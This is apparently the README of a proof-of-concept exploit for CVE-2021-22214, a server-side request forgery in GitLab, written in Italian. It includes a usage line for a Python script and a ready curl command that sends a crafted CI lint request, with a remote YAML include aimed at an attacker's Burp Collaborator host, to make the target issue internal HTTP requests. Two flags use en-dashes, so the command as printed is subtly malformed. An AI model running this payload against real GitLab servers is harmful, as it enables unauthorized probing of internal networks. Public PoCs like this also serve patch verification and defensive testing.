
Proof-of-concept exploit per CVE-2021-22214, una server-side request forgery nei webhook di GitLab, che consente ad attaccanti non autenticati di effettuare richieste HTTP interne.
POC per CVE-2021-22214: Gitlab SSRF
L'installazione remota di GitLab contiene una vulnerabilità di Server-side request forgery (SSRF) dovuta all'abilitazione della rete interna per i webhook. Un attaccante remoto non autenticato può sfruttare un'istanza GitLab con registrazione limitata, causando l'invio di richieste HTTP a un dominio arbitrario scelto dall'attaccante.
usage: python3 GitLab_SSRF.py <target> <burp_collaborator_url>
curl -s –show-error -H 'Content-Type: application/json' https://TargetIP/api/v4/ci/lint –data '{ "include_merged_yaml": true, "content": "include:\n remote: http://Burp-Collaborator/test.yml"}'